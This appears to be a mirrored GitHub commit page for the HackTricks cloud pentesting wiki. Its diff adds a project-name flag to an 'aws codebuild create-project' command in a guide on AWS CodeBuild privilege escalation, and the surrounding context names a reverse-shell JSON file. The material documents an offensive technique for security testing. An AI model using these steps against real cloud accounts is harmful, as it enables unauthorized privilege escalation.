mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-06-27 08:54:23 -07:00
Merge pull request #128 from RealFakeAccount/add-projectname-pentesting-cloud/aws-security/aws-privilege-escalation
Update aws-codebuild-privesc.md
This commit is contained in:
@@ -118,7 +118,7 @@ REV_PATH="/tmp/rev.json"
|
||||
printf "$JSON" > $REV_PATH
|
||||
|
||||
# Create project
|
||||
aws codebuild create-project --cli-input-json file://$REV_PATH
|
||||
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
|
||||
|
||||
# Build it
|
||||
aws codebuild start-build --project-name codebuild-demo-project
|
||||
|
||||
Reference in New Issue
Block a user